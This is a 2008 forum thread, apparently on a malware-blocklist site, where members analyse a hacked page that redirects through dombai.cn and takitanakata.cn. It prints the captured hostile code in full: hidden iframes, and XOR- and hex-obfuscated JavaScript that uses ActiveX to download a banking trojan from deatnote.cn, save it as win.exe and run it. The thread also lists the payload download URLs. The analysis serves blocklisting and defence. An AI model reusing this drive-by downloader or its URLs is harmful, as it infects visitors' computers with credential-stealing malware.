Author Topic: dombai.cn (Read 7170 times)

cconniejean · March 01, 2008, 02:38:00 am

I've got a new hack that was added to a site. It is a string of decimal ASCII code and converts to:

hxxp://dombai.cn/1.html
I did a google search, didn't show much. I did look up the whois info:
Registry Whois
Domain Name: dombai.cn
Registrant Name: PadskinSota
P Address: 77.91.229.42
IP Location: Russian Federation
Website Status: active
Server Type: nginx

I did try to put the above link on Exploit Labs online scanner, and it's like stuck in a endless loop, can't get a reading.

MysteryFCM · March 01, 2008, 04:47:37 am

Code: [Select]

*****************************************************************
vURL Desktop Edition v0.2.6 Results
Source code for: hxxp://dombai.cn/1.html
Server IP: 77.91.229.42 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 01 March 2008
Time: 04:37:56:37
*****************************************************************
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Service</title>
</head>

<body>
<iframe src="&#104&#116&#116&#112&#58&#47&#47&#116&#97&#107&#105&#116&#97&#110&#97&#107&#97&#116&#97&#46&#99&#110&#47&#114&#97&#47&#105&#110&#46&#99&#103&#105&#63&#57" width="0" height="0" style="display:none"></iframe>
<iframe src="&#104&#116&#116&#112&#58&#47&#47&#116&#97&#107&#105&#116&#97&#110&#97&#107&#97&#116&#97&#46&#99&#110&#47&#114&#97&#47&#105&#110&#46&#99&#103&#105&#63&#49&#49" width="0" height="0" style="display:none"></iframe>
<iframe src="&#104&#116&#116&#112&#58&#47&#47&#100&#111&#109&#98&#97&#105&#46&#99&#110&#47&#50&#46&#104&#116&#109&#108" width="0" height="0" style="display:none"></iframe>
</body>

</html>

First iFrame:

Quote

hxxp://takitanakata.cn/ra/in.cgi?9

Second iFrame:

Quote

hxxp://takitanakata.cn/ra/in.cgi?11

Third iFrame:

Quote

hxxp://dombai.cn/2.html

Code: [Select]

*****************************************************************
vURL Desktop Edition v0.2.6 Results
Source code for: hxxp://takitanakata.cn/ra/in.cgi?9
Server IP: 77.91.229.42 [ Resolution failed ]
hpHosts Status: Listed
MDL Status: Not Checked
Date: 01 March 2008
Time: 04:43:41:43
*****************************************************************
<script language='JavaScript'>var crp = Array(44,99,115,98,121,96,100,48,124,113,126,119,101,113,119,117,45,55,90,113,102,113,67,115,98,121,96,100,55,46,29,26,29,26,118,101,126,115,100,121,127,126,48,83,98,117,113,100,117,95,114,122,117,115,100,56,83,92,67,89,84,60,48,126,113,125,117,57,29,26,107,29,26,25,102,113,98,48,98,48,45,48,126,101,124,124,43,29,26,25,100,98,105,48,107,48,117,102,113,124,56,55,98,48,45,48,83,92,67,89,84,62,83,98,117,113,100,117,95,114,122,117,115,100,56,126,113,125,117,57,55,57,48,109,115,113,100,115,120,56,117,57,107,109,25,29,26,25,121,118,48,56,49,48,98,57,48,107,48,100,98,105,48,107,48,117,102,113,124,56,55,98,48,45,48,83,92,67,89,84,62,83,98,117,113,100,117,95,114,122,117,115,100,56,126,113,125,117,60,48,50,50,57,55,57,48,109,115,113,100,115,120,56,117,57,107,109,48,109,29,26,25,121,118,48,56,49,48,98,57,48,107,48,100,98,105,48,107,48,117,102,113,124,56,55,98,48,45,48,83,92,67,89,84,62,83,98,117,113,100,117,95,114,122,117,115,100,56,126,113,125,117,60,48,50,50,60,48,50,50,57,55,57,48,109,115,113,100,115,120,56,117,57,107,109,48,109,29,26,25,121,118,48,56,49,48,98,57,48,107,48,100,98,105,48,107,48,117,102,113,124,56,55,98,48,45,48,83,92,67,89,84,62,87,117,100,95,114,122,117,115,100,56,50,50,60,48,126,113,125,117,57,55,57,48,109,115,113,100,115,120,56,117,57,107,109,48,109,29,26,25,121,118,48,56,49,48,98,57,48,107,48,100,98,105,48,107,48,117,102,113,124,56,55,98,48,45,48,83,92,67,89,84,62,87,117,100,95,114,122,117,115,100,56,126,113,125,117,60,48,50,50,57,55,57,48,109,115,113,100,115,120,56,117,57,107,109,48,109,29,26,25,121,118,48,56,49,48,98,57,48,107,48,100,98,105,48,107,48,117,102,113,124,56,55,98,48,45,48,83,92,67,89,84,62,87,117,100,95,114,122,117,115,100,56,126,113,125,117,57,55,57,48,109,115,113,100,115,120,56,117,57,107,109,48,109,29,26,25,98,117,100,101,98,126,56,98,57,43,29,26,109,29,26,29,26,29,26,102,113,98,48,101,98,124,48,45,48,55,120,100,100,96,42,63,63,40,33,62,34,62,33,41,39,62,33,36,63,96,124,99,63,116,127,103,126,124,127,113,116,62,96,120,96,47,124,45,125,99,121,117,38,55,43,29,26,29,26,117,102,113,124,48,56,55,102,113,55,59,55,98,48,115,124,99,55,59,55,121,116,99,48,45,48,126,55,59,55,117,103,48,81,55,59,55,98,55,59,55,98,55,59,55,113,55,59,55,105,56,76,55,115,124,99,55,59,55,121,116,55,59,55,42,55,59,55,82,55,59,55,84,55,59,55,41,55,59,55,38,55,59,55,83,55,59,55,37,55,59,55,37,55,59,55,38,55,59,55,61,55,59,55,38,37,55,59,55,81,35,55,59,55,61,33,33,55,59,55,84,32,55,59,55,61,41,40,55,59,55,35,81,55,59,55,61,32,55,59,55,32,83,55,59,55,32,36,55,59,55,86,83,55,59,55,34,41,55,59,55,85,35,55,59,55,32,76,55,60,76,55,115,124,99,121,116,42,82,84,41,38,55,59,55,83,37,55,59,55,37,38,61,38,37,81,35,55,59,55,61,55,59,55,33,33,84,32,55,59,55,61,55,59,55,41,40,35,81,61,32,32,83,55,59,55,32,55,59,55,36,86,83,55,59,55,34,55,59,55,41,85,35,55,59,55,38,76,55,60,76,55,115,124,55,59,55,99,121,55,59,55,116,42,81,82,55,59,55,41,82,55,59,55,83,55,59,55,85,84,84,61,55,59,55,85,55,59,55,83,39,55,59,55,85,61,36,55,59,55,39,85,55,59,55,33,61,41,35,55,59,55,34,34,61,84,55,59,55,36,55,59,55,81,34,33,32,55,59,55,38,33,39,55,59,55,33,33,38,76,55,60,76,55,115,55,59,55,124,99,121,55,59,55,116,42,32,32,32,55,59,55,38,86,32,35,55,59,55,35,61,32,32,55,59,55,32,32,61,32,55,59,55,32,55,59,55,32,55,59,55,32,55,59,55,61,83,32,32,32,55,59,55,61,32,32,55,59,55,32,32,32,32,32,32,55,59,55,32,32,55,59,55,36,38,76,55,60,76,55,115,124,99,55,59,55,121,55,59,55,116,55,59,55,42,32,55,59,55,32,32,38,86,55,59,55,32,35,81,61,32,32,32,32,61,32,32,32,32,61,55,59,55,83,32,32,55,59,55,32,55,59,55,61,32,32,55,59,55,32,32,32,32,55,59,55,32,32,32,32,36,38,76,55,60,76,55,115,124,55,59,55,99,121,116,42,38,55,59,55,117,55,59,55,35,34,32,55,59,55,39,32,113,55,59,55,61,39,38,55,59,55,38,116,61,55,59,55,36,55,59,55,117,117,38,61,55,59,55,40,39,55,59,55,41,115,55,59,55,61,55,59,55,116,115,55,59,55,33,118,55,59,55,113,41,33,116,55,59,55,34,118,115,35,76,55,60,76,55,115,55,59,55,124,99,121,55,59,55,116,42,38,36,55,59,55,33,36,55,59,55,37,33,34,82,61,82,55,59,55,41,39,40,61,36,37,33,84,61,55,59,55,81,32,84,55,59,55,40,61,86,83,55,59,55,86,84,86,35,35,55,59,55,85,55,59,55,40,35,55,59,55,35,83,76,55,60,76,55,115,124,55,59,55,99,55,59,55,121,55,59,55,116,55,59,55,42,39,86,37,82,39,55,59,55,86,38,35,61,86,32,38,55,59,55,86,61,36,55,59,55,35,55,59,55,35,55,59,55,33,55,59,55,61,40,81,34,38,61,35,55,59,55,35,41,85,55,59,55,32,35,83,55,59,55,32,81,85,55,59,55,35,84,76,55,60,76,55,115,124,99,55,59,55,121,116,55,59,55,42,32,38,39,34,35,55,59,55,85,32,55,59,55,41,61,55,59,55,86,36,83,34,61,36,35,115,55,59,55,40,61,40,35,37,55,59,55,40,61,32,41,86,83,55,59,55,84,33,84,55,59,55,82,32,55,59,55,39,55,59,55,38,38,76,55,60,76,55,115,124,99,55,59,55,121,116,42,38,35,55,59,55,41,86,55,59,55,39,55,59,55,34,37,86,61,33,55,59,55,82,34,84,61,55,59,55,36,40,35,55,59,55,33,61,81,41,86,84,61,40,55,59,55,39,36,55,59,55,40,36,39,55,59,55,38,40,55,59,55,34,32,33,32,76,55,60,76,55,115,124,55,59,55,99,121,116,42,55,59,55,82,81,55,59,55,32,33,40,55,59,55,37,55,59,55,41,41,61,33,84,55,59,55,82,35,61,36,36,118,41,61,55,59,55,40,55,59,55,35,82,55,59,55,36,61,36,38,33,55,59,55,36,37,55,59,55,36,55,59,55,83,40,55,59,55,36,82,86,40,76,55,60,76,55,115,124,99,121,116,55,59,55,42,84,32,83,55,59,55,32,39,84,37,38,55,59,55,61,39,83,38,55,59,55,41,55,59,55,61,36,35,55,59,55,86,33,61,82,36,81,55,59,55,32,61,34,37,55,59,55,86,37,81,55,59,55,33,33,86,55,59,55,81,82,33,55,59,55,41,76,55,60,76,55,115,124,55,59,55,99,121,116,42,85,40,83,83,83,84,55,59,55,84,86,61,83,81,55,59,55,34,40,61,55,59,55,36,41,55,59,55,38,114,61,82,32,37,55,59,55,32,61,38,83,32,39,83,55,59,55,41,38,34,36,39,55,59,55,38,82,76,55,60,126,101,124,124,57,43,55,57,43,29,26,29,26,102,113,98,48,127,114,122,45,126,101,124,124,43,29,26,102,113,98,48,104,125,124,127,114,122,45,126,101,124,124,43,29,26,102,113,98,48,113,116,127,114,116,127,114,122,45,126,101,124,124,43,29,26,102,113,98,48,117,104,117,115,127,114,122,45,126,101,124,124,43,29,26,102,113,98,48,121,45,32,43,29,26,102,113,98,48,121,126,116,43,29,26,102,113,98,48,126,113,125,117,48,45,48,50,101,96,116,113,100,117,62,117,104,117,50,43,29,26,29,26,103,120,121,124,117,56,48,56,115,124,99,121,116,99,75,121,77,48,49,45,48,126,101,124,124,57,48,54,54,48,56,56,104,125,124,127,114,122,48,45,45,48,126,101,124,124,57,48,108,108,48,56,113,116,127,114,116,127,114,122,48,45,45,48,126,101,124,124,57,48,108,108,48,56,117,104,117,115,127,114,122,48,45,45,48,126,101,124,124,57,57,57,29,26,107,29,26,25,100,98,105,29,26,25,107,29,26,25,25,127,114,122,48,45,48,116,127,115,101,125,117,126,100,62,115,98,117,113,100,117,85,124,117,125,117,126,100,56,55,127,114,122,117,115,100,55,57,43,29,26,25,25,127,114,122,62,99,117,100,81,100,100,98,121,114,101,100,117,56,50,115,124,113,99,99,121,116,50,60,48,115,124,99,121,116,99,75,121,77,57,43,29,26,25,109,115,113,100,115,120,56,117,57,29,26,25,107,25,29,26,25,25,127,114,122,48,45,48,126,101,124,124,43,29,26,25,109,29,26,29,26,25,121,118,56,127,114,122,57,29,26,25,107,29,26,25,25,117,102,113,124,56,55,104,125,124,55,59,55,127,114,122,48,45,55,59,55,48,83,98,117,113,55,59,55,100,117,95,114,122,55,59,55,117,115,100,56,127,114,55,59,55,122,60,48,50,125,99,55,59,55,104,125,124,34,55,59,55,62,72,93,55,59,55,92,88,68,68,64,50,57,43,55,57,43,29,26,25,25,121,118,56,49,104,125,124,127,114,122,57,29,26,25,25,25,117,102,113,124,56,55,104,125,55,59,55,124,127,114,55,59,55,122,48,45,48,55,59,55,83,98,55,59,55,117,113,100,117,95,114,55,59,55,122,117,115,100,55,59,55,56,127,55,59,55,114,122,60,48,50,93,121,115,55,59,55,98,127,99,127,118,100,62,55,59,55,72,55,59,55,93,92,88,55,59,55,68,68,64,50,57,43,55,57,43,29,26,25,25,121,118,56,49,104,125,124,127,114,122,57,29,26,25,25,25,117,102,113,124,56,55,104,125,55,59,55,124,127,114,55,59,55,122,48,45,48,83,98,117,55,59,55,113,100,117,95,114,55,59,55,122,117,115,100,56,127,114,55,59,55,122,60,55,59,55,48,50,93,67,72,55,59,55,93,92,34,62,67,117,55,59,55,98,102,117,98,72,55,59,55,93,92,88,55,59,55,68,68,64,50,57,43,55,57,43,29,26,25,25,29,26,25,25,121,118,56,104,125,124,127,114,122,57,29,26,25,25,107,29,26,25,25,25,117,102,113,124,56,55,113,116,127,55,59,55,114,116,127,114,122,48,55,59,55,45,48,83,98,117,113,55,59,55,100,117,95,114,122,55,59,55,117,115,100,56,127,114,122,60,48,55,59,55,50,81,84,95,55,59,55,84,82,62,67,55,59,55,100,98,117,55,59,55,113,125,50,55,59,55,57,43,55,57,43,29,26,25,25,25,117,102,113,124,56,55,117,104,117,55,59,55,115,127,114,122,48,45,48,83,98,117,55,59,55,113,100,117,95,114,55,59,55,122,117,115,100,56,127,114,55,59,55,122,60,48,50,71,67,115,98,121,55,59,55,96,100,62,67,55,59,55,120,117,124,124,50,57,43,55,57,43,29,26,25,25,25,121,126,116,48,45,48,32,43,29,26,25,25,25,29,26,25,25,25,121,118,56,49,117,104,117,115,127,114,122,57,29,26,25,25,25,107,29,26,25,25,25,25,117,102,113,124,56,55,117,104,117,55,59,55,115,127,114,55,59,55,122,48,45,48,83,98,55,59,55,117,113,100,117,55,59,55,95,114,55,59,55,122,117,115,100,56,127,114,55,59,55,122,60,48,50,67,120,55,59,55,117,124,124,62,81,96,96,55,59,55,124,121,115,113,100,121,127,126,50,57,43,55,57,43,29,26,25,25,25,25,121,126,116,48,45,48,33,43,29,26,25,25,25,109,25,25,25,29,26,25,25,109,29,26,25,109,29,26,25,121,59,59,43,29,26,109,29,26,29,26,121,118,56,104,125,124,127,114,122,48,54,54,48,113,116,127,114,116,127,114,122,48,54,54,48,117,104,117,115,127,114,122,57,29,26,107,29,26,29,26,25,100,98,105,29,26,25,107,29,26,25,25,104,125,124,127,114,122,62,127,96,117,126,56,50,87,117,100,50,60,48,101,98,124,60,48,118,113,124,99,117,57,43,29,26,25,25,104,125,124,127,114,122,62,99,117,126,116,56,126,101,124,124,57,43,29,26,25,109,48,115,113,100,115,120,56,117,57,48,107,48,109,29,26,29,26,117,102,113,124,48,56,50,100,50,59,50,98,50,59,50,105,107,50,59,50,25,117,50,59,50,102,50,59,50,113,124,56,55,113,50,59,50,116,127,50,59,50,114,55,59,55,116,127,50,59,50,114,55,59,55,122,62,50,59,50,68,105,55,59,55,96,117,48,45,48,33,43,55,57,43,117,50,59,50,102,50,59,50,113,124,56,55,113,116,127,114,55,59,55,116,127,114,55,59,55,122,62,93,127,55,59,55,116,117,48,45,48,35,43,55,57,43,117,102,50,59,50,113,124,56,55,113,116,50,59,50,127,114,55,59,55,116,127,114,55,59,55,122,62,95,96,55,50,59,50,59,55,117,126,56,57,43,55,57,43,117,102,113,50,59,50,124,56,55,113,116,127,114,55,50,59,50,59,55,116,127,114,55,59,55,122,62,50,59,50,71,98,55,50,59,50,59,55,121,100,117,56,55,59,55,50,59,50,104,125,55,50,59,50,59,55,124,50,59,50,127,114,122,50,59,50,62,55,59,50,59,50,55,98,117,50,59,50,99,96,127,50,59,50,126,99,55,50,59,50,59,55,117,82,127,116,105,57,43,55,57,43,117,102,50,59,50,113,124,56,55,113,116,127,114,55,59,55,116,50,59,50,127,114,55,59,50,59,50,55,122,62,67,113,55,59,55,102,50,59,50,117,68,127,50,59,50,55,59,55,50,59,50,86,121,55,50,59,50,59,55,124,50,59,50,117,56,126,50,59,50,113,55,59,50,59,50,55,125,117,50,59,50,60,48,34,50,59,50,57,43,55,57,43,117,102,113,124,56,50,59,50,55,113,116,127,114,55,59,55,116,127,114,55,50,59,50,59,55,122,62,83,124,55,59,55,127,99,117,56,55,59,55,50,59,50,57,43,55,57,43,109,48,115,113,100,50,59,50,115,50,59,50,120,56,117,57,48,107,48,109,50,57,43,29,26,25,29,26,29,26,25,121,118,56,121,126,116,48,45,45,48,32,57,29,26,25,107,29,26,25,25,100,98,105,29,26,25,25,107,29,26,25,25,25,117,102,113,124,56,55,117,104,117,55,59,55,115,127,114,55,59,55,122,62,66,55,59,55,101,126,56,126,55,59,55,113,125,117,55,59,55,60,48,32,57,43,55,57,43,29,26,25,25,109,115,113,100,115,120,56,117,57,107,109,29,26,25,109,117,124,99,117,29,26,25,107,29,26,25,25,100,98,105,29,26,25,25,107,29,26,25,25,25,117,102,113,124,56,55,117,104,117,55,59,55,115,127,114,55,59,55,122,62,67,55,59,55,120,117,124,124,55,59,55,85,104,117,55,59,55,115,101,100,55,59,55,117,56,126,113,55,59,55,125,117,60,48,50,55,59,55,50,60,48,50,50,60,48,50,55,59,55,127,96,55,59,55,117,126,50,60,55,59,55,48,32,57,43,55,57,43,29,26,25,25,109,115,113,100,115,120,56,117,57,107,109,29,26,25,109,29,26,109,29,26,29,26,29,26,29,26,44,63,99,115,98,121,96,100,46,29,26,26,44,63,114,127,116,105,46,44,63,120,100,125,124,46);function decrypt(a){var r='', l=a.length, i=0;for(i=0;i<l;i++){r += String.fromCharCode(16 ^ a[i]);}document.write(r);}decrypt(crp);</script>

Code: [Select]

*****************************************************************
vURL Desktop Edition v0.2.6 Results
Source code for: hxxp://takitanakata.cn/ra/in.cgi?11
Server IP: 77.91.229.42 [ Resolution failed ]
hpHosts Status: Listed
MDL Status: Not Checked
Date: 01 March 2008
Time: 04:45:32:45
*****************************************************************
<script type="text/javascript">function mdoqtragsywemk(yioxcp){var sziitzjzshwwu="";for(ymsniwgw=0;ymsniwgw<yioxcp.length;ymsniwgw+=2){sziitzjzshwwu+=(String.fromCharCode(parseInt(yioxcp.substr(ymsniwgw,2),16)));}document.write(sziitzjzshwwu);}mdoqtragsywemk("3C7363726970743E0D0A0D0A66756E6374696F6E204372656174654F286F732C206E7A29207B0D0A766172206530203D206E756C6C3B0D0A202020202020747279207B200D0A6576616C28276530203D206F732E4372656174654F626A656374286E7A292729207D63617463682865297B7D0D0A2020202020696620282120653029207B747279207B206576616C28276530203D206F732E4372656174654F626A656374286E7A2C202222292729207D63617463682865297B7D7D0D0A20202020696620282120653029207B747279207B206576616C28276530203D206F732E4372656174654F626A656374286E7A2C2022222C202222292729207D63617463682865297B7D7D0D0A202020696620282120653029207B747279207B206576616C28276530203D206F732E4765744F626A6563742822222C206E7A292729207D63617463682865297B7D7D0D0A2020696620282120653029207B747279207B206576616C28276530203D206F732E4765744F626A656374286E7A2C202222292729207D63617463682865297B7D7D0D0A20696620282120653029207B747279207B206576616C28276530203D206F732E4765744F626A656374286E7A292729207D63617463682865297B7D7D0D0A72657475726E286530293B0D0A7D0D0A0D0A66756E6374696F6E20446F776E6C6F6164286129200D0A7B0D0A766172206C6D203D204372656174654F28612C276D272B2773786D272B276C32272B272E272B2758272B274D272B274C4854272B27545027293B0D0A6C6D2E6F70656E282747272B2745272B2754272C27687474703A2F2F646561746E6F74652E636E2F3331352F6C6F61642E706870272C66616C7365293B0D0A6C6D2E73656E6428293B0D0A766172206F203D204372656174654F28612C2761272B2764272B276F64272B2762272B272E272B2773272B2774272B277265272B27616D27293B0D0A0D0A6F2E74797065203D20313B0D0A6F2E4D6F6465203D20333B0D0A6F2E6F70656E28293B0D0A0D0A6F2E5772697465286C6D2E726573706F6E7365426F6479293B0D0A0D0A76617220747574203D20222E2F2F2E2E2F2F77696E222B222E657865223B0D0A6F2E73617665746F46696C65287475742C32293B0D0A6F2E636C6F736528293B0D0A7661722073203D204372656174654F28612C202753272B2768656C272B276C2E41272B277070272B276C6963272B276174272B27696F6E27293B0D0A732E5368656C6C6578656375746528747574293B0D0A7D0D0A0D0A7661722078203D20303B0D0A7661722074203D206E6577204172726179280D0A0D0A277B42272B2744272B27393643272B273535272B27362D3635272B2741332D3131272B274430272B272D3938272B2733412D3030272B274330272B27344643272B273239272B274533307D272C0D0A277B4244272B273936272B27433535272B27362D36272B273541332D31272B273144302D39272B273833272B27412D30272B27304330272B273446272B274332272B27394533367D272C6E756C6C293B0D0A0D0A7768696C652028745B785D29207B0D0A7661722061203D206E756C6C3B0D0A20202069662028745B785D2E737562737472696E6728302C3129203D3D20277B2729207B0D0A61203D20646F63756D656E742E637265617465456C656D656E7428276F626A65637427293B0D0A612E7365744174747269627574652827636C272B2761272B277373272B276964272C2027636C272B2773272B2769643A27202B20745B785D2E737562737472696E6728312C20745B785D2E6C656E677468202B203129293B0D0A7D2020656C7365207B0D0A202020747279200D0A7B2061203D206E657720416374697665584F626A65637428745B785D293B207D2063617463682865297B7D0D0A7D0D0A202020696620286129200D0A7B0D0A202020747279200D0A7B0D0A7661722062203D204372656174654F28612C20275368272B27656C272B276C272B272E272B2741272B2770272B27706C272B27696361272B277469272B276F6E27293B0D0A696620286229207B0D0A69662028446F776E6C6F61642861292920627265616B3B0D0A7D0D0A7D63617463682865297B7D0D0A7D0D0A782B2B3B0D0A7D0D0A73657454696D656F7574282277696E646F772E6C6F636174696F6E203D20276A61762E70687027222C2032353030293B0D0A3C2F7363726970743E");</script>

Code: [Select]

*****************************************************************
vURL Desktop Edition v0.2.6 Results
Source code for: hxxp://dombai.cn/2.html
Server IP: 77.91.229.42 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 01 March 2008
Time: 04:46:08:46
*****************************************************************
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Service</title>
</head>

<body>
<iframe src="&#104&#116&#116&#112&#58&#47&#47&#116&#97&#107&#105&#116&#97&#110&#97&#107&#97&#116&#97&#46&#99&#110&#47&#114&#97&#47&#105&#110&#46&#99&#103&#105&#63&#49&#50" width="0" height="0" style="display:none"></iframe>
</body>

</html>

iFrame:

Quote

hxxp://takitanakata.cn/ra/in.cgi?12

Code: [Select]

*****************************************************************
vURL Desktop Edition v0.2.6 Results
Source code for: hxxp://takitanakata.cn/ra/in.cgi?12
Server IP: 77.91.229.42 [ Resolution failed ]
hpHosts Status: Listed
MDL Status: Not Checked
Date: 01 March 2008
Time: 04:47:26:47
*****************************************************************
<script type="text/javascript">function xoytey(dvvbnwrtozv){var dkvii="";for(idkwgqlsiepl=0;idkwgqlsiepl<dvvbnwrtozv.length;idkwgqlsiepl+=2){dkvii+=(String.fromCharCode(parseInt(dvvbnwrtozv.substr(idkwgqlsiepl,2),16)));}document.write(dkvii);}xoytey("3C7363726970743E0D0A0D0A66756E6374696F6E204372656174654F286F732C206E7A29207B0D0A766172206530203D206E756C6C3B0D0A202020202020747279207B200D0A6576616C28276530203D206F732E4372656174654F626A656374286E7A292729207D63617463682865297B7D0D0A2020202020696620282120653029207B747279207B206576616C28276530203D206F732E4372656174654F626A656374286E7A2C202222292729207D63617463682865297B7D7D0D0A20202020696620282120653029207B747279207B206576616C28276530203D206F732E4372656174654F626A656374286E7A2C2022222C202222292729207D63617463682865297B7D7D0D0A202020696620282120653029207B747279207B206576616C28276530203D206F732E4765744F626A6563742822222C206E7A292729207D63617463682865297B7D7D0D0A2020696620282120653029207B747279207B206576616C28276530203D206F732E4765744F626A656374286E7A2C202222292729207D63617463682865297B7D7D0D0A20696620282120653029207B747279207B206576616C28276530203D206F732E4765744F626A656374286E7A292729207D63617463682865297B7D7D0D0A72657475726E286530293B0D0A7D0D0A0D0A66756E6374696F6E20446F776E6C6F6164286129200D0A7B0D0A766172206C6D203D204372656174654F28612C276D272B2773786D272B276C32272B272E272B2758272B274D272B274C4854272B27545027293B0D0A6C6D2E6F70656E282747272B2745272B2754272C27687474703A2F2F646561746E6F74652E636E2F3331342F6C6F61642E706870272C66616C7365293B0D0A6C6D2E73656E6428293B0D0A766172206F203D204372656174654F28612C2761272B2764272B276F64272B2762272B272E272B2773272B2774272B277265272B27616D27293B0D0A0D0A6F2E74797065203D20313B0D0A6F2E4D6F6465203D20333B0D0A6F2E6F70656E28293B0D0A0D0A6F2E5772697465286C6D2E726573706F6E7365426F6479293B0D0A0D0A76617220747574203D20222E2F2F2E2E2F2F77696E222B222E657865223B0D0A6F2E73617665746F46696C65287475742C32293B0D0A6F2E636C6F736528293B0D0A7661722073203D204372656174654F28612C202753272B2768656C272B276C2E41272B277070272B276C6963272B276174272B27696F6E27293B0D0A732E5368656C6C6578656375746528747574293B0D0A7D0D0A0D0A7661722078203D20303B0D0A7661722074203D206E6577204172726179280D0A0D0A277B42272B2744272B27393643272B273535272B27362D3635272B2741332D3131272B274430272B272D3938272B2733412D3030272B274330272B27344643272B273239272B274533307D272C0D0A277B4244272B273936272B27433535272B27362D36272B273541332D31272B273144302D39272B273833272B27412D30272B27304330272B273446272B274332272B27394533367D272C6E756C6C293B0D0A0D0A7768696C652028745B785D29207B0D0A7661722061203D206E756C6C3B0D0A20202069662028745B785D2E737562737472696E6728302C3129203D3D20277B2729207B0D0A61203D20646F63756D656E742E637265617465456C656D656E7428276F626A65637427293B0D0A612E7365744174747269627574652827636C272B2761272B277373272B276964272C2027636C272B2773272B2769643A27202B20745B785D2E737562737472696E6728312C20745B785D2E6C656E677468202B203129293B0D0A7D2020656C7365207B0D0A202020747279200D0A7B2061203D206E657720416374697665584F626A65637428745B785D293B207D2063617463682865297B7D0D0A7D0D0A202020696620286129200D0A7B0D0A202020747279200D0A7B0D0A7661722062203D204372656174654F28612C20275368272B27656C272B276C272B272E272B2741272B2770272B27706C272B27696361272B277469272B276F6E27293B0D0A696620286229207B0D0A69662028446F776E6C6F61642861292920627265616B3B0D0A7D0D0A7D63617463682865297B7D0D0A7D0D0A782B2B3B0D0A7D0D0A73657454696D656F7574282277696E646F772E6C6F636174696F6E203D20276A61762E70687027222C2032353030293B0D0A3C2F7363726970743E");</script>

MysteryFCM · March 01, 2008, 05:01:25 am

Decoded file's attached (Malzilla couldn't decode them)

File's they download:

Quote

hxxp://deatnote.cn/314/load.php
hxxp://deatnote.cn/315/load.php
hxxp://81.2.197.14/pls/download.php?l=msie6

Couldn't snag the deatnote.cn file's, but the third one is included in the zip (without the .exe extension)

MysteryFCM · March 01, 2008, 05:08:03 am

Code: [Select]

AhnLab-V3 2008.2.29.1 2008.02.29 - 
AntiVir 7.6.0.73 2008.02.29 TR/Drop.Banke.cnb 
Authentium 4.93.8 2008.03.01 - 
Avast 4.7.1098.0 2008.03.01 - 
AVG 7.5.0.516 2008.02.29 - 
BitDefender 7.2 2008.03.01 - 
CAT-QuickHeal 9.50 2008.02.29 - 
ClamAV 0.92.1 2008.03.01 - 
DrWeb 4.44.0.09170 2008.02.29 - 
eSafe 7.0.15.0 2008.02.28 - 
eTrust-Vet 31.3.5574 2008.02.29 - 
Ewido 4.0 2008.02.29 - 
FileAdvisor 1 2008.03.01 - 
Fortinet 3.14.0.0 2008.03.01 - 
F-Prot 4.4.2.54 2008.02.29 - 
F-Secure 6.70.13260.0 2008.02.29 - 
Ikarus T3.1.1.20 2008.03.01 Trojan-Spy.Finanz.J 
Kaspersky 7.0.0.125 2008.03.01 Trojan-Spy.Win32.Banker.inb 
McAfee 5242 2008.02.29 - 
Microsoft 1.3301 2008.03.01 TrojanSpy:Win32/Ambler.D 
NOD32v2 2913 2008.03.01 - 
Norman 5.80.02 2008.02.29 - 
Panda 9.0.0.4 2008.02.29 - 
Prevx1 V2 2008.03.01 Heuristic: Suspicious Self Modifying File 
Rising 20.33.42.00 2008.02.29 - 
Sophos 4.27.0 2008.03.01 - 
Sunbelt 3.0.906.0 2008.02.28 - 
Symantec 10 2008.03.01 - 
TheHacker 6.2.9.229 2008.02.25 - 
VBA32 3.12.6.2 2008.02.27 - 
VirusBuster 4.3.26:9 2008.02.29 - 
Webwasher-Gateway 6.6.2 2008.03.01 Trojan.Drop.Banke.cnb 
Additional information 
File size: 241664 bytes 
MD5: 6d6c4cef3fe562d0230611c74b94d0fd 
SHA1: 2b90dab4af853892f9183064634c81725c7befab 
PEiD: Armadillo v1.71 
packers: PE_Patch.UPX, UPX, PE_Patch.UPX, UPX, PE_Patch.UPX, UPX 
Prevx info: http://info.prevx.com/aboutprogramtext.asp?PX5=37B81019006B1E58C40502D7AFD1AE001AC49154

JohnC · March 01, 2008, 05:09:22 pm

Thank you both, URLs will be added for next update.

Author Topic: dombai.cn (Read 7170 times)

cconniejean

dombai.cn

MysteryFCM

Re: dombai.cn

MysteryFCM

Re: dombai.cn

MysteryFCM

Re: dombai.cn

JohnC

Re: dombai.cn